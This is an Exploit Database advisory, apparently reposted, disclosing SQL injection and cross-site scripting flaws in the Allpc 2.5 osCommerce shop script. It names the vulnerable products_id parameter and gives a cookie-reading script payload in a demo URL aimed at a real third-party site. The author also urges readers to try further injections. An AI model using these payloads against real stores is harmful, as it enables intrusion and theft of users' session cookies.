Allpc 2.5 osCommerce – SQL Injection / Cross-Site Scripting

• Exploit Database
• 28 阅读

• 作者： **RoAd_KiLlEr**
  日期： 2010-09-27
• 类别：

  • webapps
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/15128/

• [+]Title Allpc 2.5 osCommerceSQL-i/XSS Multiple Vulnerabilities
  [+]Author**RoAd_KiLlEr**
  [+]ContactRoAd_KiLlEr[at]Khg-Crew[dot]Ws
  [+]Tested onWin Xp Sp 2/3
  ---------------------------------------------------------------------------
  [~] Founded by **RoAd_KiLlEr**
  [~] Team: Albanian Hacking Crew
  [~] Version:	2.5
  [~] Vendor: http://www.allpcscript.com
  ==========ExPl0iT3d by **RoAd_KiLlEr**==========
  
  [+]Description:
  Compatible with all versions of PHP 4 and above. 
  It uses a database MySQL. 
  It works in 4 languages, which are easily replaced in the administration panel. 
  
  * Appearance: 
  - The client part 
  - Administration 
  
  * Install / Installation 
  - Simple automatic installation via the web-browser 
  
  * Design / Placement 
  - A simple change of patterns 
  - Support for dynamic images 
  
  * Administration / Functional 
  - Supports unlimited products and categories 
  The structure of products in categories 
  The structure of the categories to the categories 
  - Add / edit / delete categories, products, manufacturers, customers, and reviews 
  - Support for physical (shippable) and virtual (zagruzhaemye) products 
  - Land Administration is protected with username and password 
  - Contact customers directly via email or contact the user 
  - Easy to book and restore the database 
  - Print invoices and packaging lists from the order 
  - Statistics for products and customers 
  - Multilingual support 
  - Support the use of multiple currencies 
  - Automatic exchange rates 
  - Select what to display, and in what order the product that make the list page 
  - Support for static and dynamic banners with full statistics
  =========================================
  
  [+].SQL-i Vulnerability
  =+=+=+=+=+=+=+=+=+
  
  [P0C]:http://127.0.0.1/allpc25free/product_info.php?products_id=[SQL Injection] 
  
  [DemO]: http://127.0.0.1/allpc25free/product_info.php?products_id=[SQL Injection]
  
  [+]. XSS Vulnerability
  =+=+=+=+=+=+=+=+=
  
  The Search B0x of this script is vulnerable to XSS,because it fails to properly sanitize the response.
  By submitting a malicious input to the web site, the user would only be able to compromise their security.That is their own browser cookies, cache objects, and so forth. 
  
  
  [DemO]: http://neways4u.com/advanced_search_result.php?keywords=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
  
  [Atack Pattern]: "><script>alert(document.cookie)</script> 
  
   I used this pattern to show you that is vulnerable,but you can try HTML Injection,Url Redirect, Iframe,Etc.. Basically Your own Imagination is your Limit.. 
   Good Luck :P 
  
  
  ===========================================================================================
  [!] Albanian Hacking Crew 
  ===========================================================================================
  [!] **RoAd_KiLlEr** 
  ===========================================================================================
  [!] MaiL: sukihack[at]gmail[dot]com
  ===========================================================================================
  [!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | The|DennY` | EaglE EyE | THE_1NV1S1BL3 & All Albanian/Kosova Hackers 
  ===========================================================================================
  [!] Spec Th4nks:r0073r| indoushka | Sid3^effects| L0rd CruSad3r | SONIC | MaFFiTeRRoR | AllInj3ct0r.com Members | And All My Friendz
  ===========================================================================================
  [!] Red n'black i dress eagle on my chest
  It's good to be an ALBANIAN
  Keep my head up high for that flag I die
  Im proud to be an ALBANIAN
  ===========================================================================================